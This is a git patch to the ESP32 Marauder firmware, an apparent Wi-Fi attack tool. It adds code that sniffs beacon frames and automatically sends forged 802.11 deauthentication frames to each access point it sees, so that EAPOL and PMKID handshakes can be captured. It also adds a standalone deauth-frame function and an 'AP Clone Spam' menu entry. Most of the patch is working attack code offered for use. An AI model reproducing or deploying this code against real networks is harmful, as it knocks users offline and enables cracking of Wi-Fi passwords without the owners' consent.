From 4aa93e2cc3389cfd452d1b7dfedfee65d4a43e06 Mon Sep 17 00:00:00 2001 From: Just Call Me Koko Date: Mon, 20 Jun 2022 21:17:06 -0400 Subject: [PATCH] Send deauth for pmkid --- esp32_marauder/MenuFunctions.cpp | 5 +++ esp32_marauder/WiFiScan.cpp | 73 +++++++++++++++++++++++++++++++- esp32_marauder/WiFiScan.h | 1 + esp32_marauder/configs.h | 4 +- esp32_marauder/lang_var.h | 3 +- 5 files changed, 82 insertions(+), 4 deletions(-) diff --git a/esp32_marauder/MenuFunctions.cpp b/esp32_marauder/MenuFunctions.cpp index 6fb1030..66a9783 100644 --- a/esp32_marauder/MenuFunctions.cpp +++ b/esp32_marauder/MenuFunctions.cpp @@ -1556,6 +1556,11 @@ void MenuFunctions::RunSetup() this->drawStatusBar(); wifi_scan_obj.StartScan(WIFI_ATTACK_DEAUTH, TFT_RED); }); + addNodes(&wifiAttackMenu, text_table1[57], TFT_MAGENTA, NULL, BEACON_LIST, [this]() { + display_obj.clearScreen(); + this->drawStatusBar(); + wifi_scan_obj.StartScan(WIFI_ATTACK_AP_SPAM, TFT_MAGENTA); + }); //addNodes(&wifiAttackMenu, "AP Mimic Flood", TFT_PURPLE, NULL, DEAUTH_SNIFF, [this]() { // display_obj.clearScreen(); // this->drawStatusBar(); diff --git a/esp32_marauder/WiFiScan.cpp b/esp32_marauder/WiFiScan.cpp index c66c596..1cf5bef 100644 --- a/esp32_marauder/WiFiScan.cpp +++ b/esp32_marauder/WiFiScan.cpp @@ -840,7 +840,8 @@ void WiFiScan::RunEapolScan(uint8_t scan_mode, uint16_t color) wifi_init_config_t cfg = WIFI_INIT_CONFIG_DEFAULT(); esp_wifi_init(&cfg); esp_wifi_set_storage(WIFI_STORAGE_RAM); - esp_wifi_set_mode(WIFI_MODE_NULL); + //esp_wifi_set_mode(WIFI_MODE_NULL); + esp_wifi_set_mode(WIFI_AP_STA); esp_wifi_start(); esp_wifi_set_promiscuous(true); esp_wifi_set_promiscuous_filter(&filt); @@ -2127,6 +2128,37 @@ void WiFiScan::sendProbeAttack(uint32_t currentTime) { } } +void WiFiScan::sendDeauthFrame(uint8_t bssid[6], int channel) { + // Itterate through all access points in list + // Check if active + WiFiScan::set_channel = channel; + esp_wifi_set_channel(channel, WIFI_SECOND_CHAN_NONE); + delay(1); + + // Build packet + + deauth_frame_default[10] = bssid[0]; + deauth_frame_default[11] = bssid[1]; + deauth_frame_default[12] = bssid[2]; + deauth_frame_default[13] = bssid[3]; + deauth_frame_default[14] = bssid[4]; + deauth_frame_default[15] = bssid[5]; + + deauth_frame_default[16] = bssid[0]; + deauth_frame_default[17] = bssid[1]; + deauth_frame_default[18] = bssid[2]; + deauth_frame_default[19] = bssid[3]; + deauth_frame_default[20] = bssid[4]; + deauth_frame_default[21] = bssid[5]; + + // Send packet + esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false); + esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false); + esp_wifi_80211_tx(WIFI_IF_AP, deauth_frame_default, sizeof(deauth_frame_default), false); + + packets_sent = packets_sent + 3; +} + void WiFiScan::sendDeauthAttack(uint32_t currentTime) { // Itterate through all access points in list for (int i = 0; i < access_points->size(); i++) { @@ -2216,6 +2248,45 @@ void WiFiScan::eapolSnifferCallback(void* buf, wifi_promiscuous_pkt_type_t type) const WifiMgmtHdr *hdr = &ipkt->hdr; } + // Found beacon frame. Decide whether to deauth + if (snifferPacket->payload[0] == 0x80) { + // Build packet + + uint8_t new_packet[26] = { + 0xc0, 0x00, 0x3a, 0x01, + 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0xf0, 0xff, 0x02, 0x00 + }; + + //esp_wifi_set_mode(WIFI_AP_STA); + + //delay(1); + + new_packet[10] = snifferPacket->payload[10]; + new_packet[11] = snifferPacket->payload[11]; + new_packet[12] = snifferPacket->payload[12]; + new_packet[13] = snifferPacket->payload[13]; + new_packet[14] = snifferPacket->payload[14]; + new_packet[15] = snifferPacket->payload[15]; + + new_packet[16] = snifferPacket->payload[10]; + new_packet[17] = snifferPacket->payload[11]; + new_packet[18] = snifferPacket->payload[12]; + new_packet[19] = snifferPacket->payload[13]; + new_packet[20] = snifferPacket->payload[14]; + new_packet[21] = snifferPacket->payload[15]; + + // Send packet + esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false); + esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false); + esp_wifi_80211_tx(WIFI_IF_AP, new_packet, sizeof(new_packet), false); + + //delay(1); + //esp_wifi_set_mode(WIFI_MODE_NULL); + } + if (( (snifferPacket->payload[30] == 0x88 && snifferPacket->payload[31] == 0x8e)|| ( snifferPacket->payload[32] == 0x88 && snifferPacket->payload[33] == 0x8e) )){ num_eapol++; Serial.println("Received EAPOL:"); diff --git a/esp32_marauder/WiFiScan.h b/esp32_marauder/WiFiScan.h index f600044..2c5e70d 100644 --- a/esp32_marauder/WiFiScan.h +++ b/esp32_marauder/WiFiScan.h @@ -230,6 +230,7 @@ class WiFiScan void tftDrawGraphObjects(); void sendProbeAttack(uint32_t currentTime); void sendDeauthAttack(uint32_t currentTime); + void sendDeauthFrame(uint8_t bssid[6], int channel); void broadcastRandomSSID(uint32_t currentTime); void broadcastCustomBeacon(uint32_t current_time, ssid custom_ssid); void broadcastCustomBeacon(uint32_t current_time, AccessPoint custom_ssid); diff --git a/esp32_marauder/configs.h b/esp32_marauder/configs.h index 6118032..ed2b2f8 100644 --- a/esp32_marauder/configs.h +++ b/esp32_marauder/configs.h @@ -4,10 +4,10 @@ #define POLISH_POTATO - #define MARAUDER_MINI + //#define MARAUDER_MINI //#define MARAUDER_V4 //#define MARAUDER_V6 - //#define MARAUDER_KIT + #define MARAUDER_KIT //#define GENERIC_ESP32 //#define MARAUDER_FLIPPER diff --git a/esp32_marauder/lang_var.h b/esp32_marauder/lang_var.h index 1aca92c..f0f15a0 100644 --- a/esp32_marauder/lang_var.h +++ b/esp32_marauder/lang_var.h @@ -95,6 +95,7 @@ PROGMEM const char text1_53[] = "Probe Req Flood"; PROGMEM const char text1_54[] = "Deauth Flood"; PROGMEM const char text1_55[] = "Join WiFi"; PROGMEM const char text1_56[] = "Select APs"; +PROGMEM const char text1_57[] = "AP Clone Spam"; //SDInterface.cpp texts @@ -171,7 +172,7 @@ PROGMEM const char text4_44[] = " AP Scan "; //Making tables PROGMEM const char *text_table0[] = {text0_0,text0_1, text0_2, text0_3, text0_4, text0_5, text0_6, text0_7, text0_8}; -PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56}; +PROGMEM const char *text_table1[] = {text1_0,text1_1,text1_2,text1_3,text1_4,text1_5,text1_6,text1_7,text1_8,text1_9,text1_10,text1_11,text1_12,text1_13,text1_14,text1_15,text1_16,text1_17,text1_18,text1_19,text1_20,text1_21,text1_22,text1_23,text1_24,text1_25,text1_26,text1_27,text1_28,text1_29,text1_30,text1_31,text1_32,text1_33,text1_34,text1_35,text1_36,text1_37,text1_38,text1_39,text1_40,text1_41,text1_42,text1_43,text1_44,text1_45,text1_46,text1_47,text1_48,text1_49,text1_50,text1_51,text1_52,text1_53,text1_54,text1_55,text1_56,text1_57}; PROGMEM const char *text_table2[] = {text2_0,text2_1,text2_2,text2_3,text2_4,text2_5,text2_6,text2_7,text2_8,text2_9,text2_10,text2_11,text2_12,text2_13,text2_14}; PROGMEM const char *text_table3[] = {text3_0,text3_1,text3_2,text3_3,text3_4,text3_5}; PROGMEM const char *text_table4[] = {text4_0,text4_1,text4_2,text4_3,text4_4,text4_5,text4_6,text4_7,text1_54,text4_9,text4_10,text4_11,text4_12,text4_13,text4_14,text4_15,text4_16,text4_17,text4_18,text4_19,text4_20,text4_21,text4_22,text4_23,text4_24,text4_25,text4_26,text4_27,text4_28,text4_29,text4_30,text4_31,text4_32,text4_33,text4_34,text4_35,text4_36,text4_37,text4_38,text4_39,text4_40,text4_41,text4_42,text4_43,text4_44};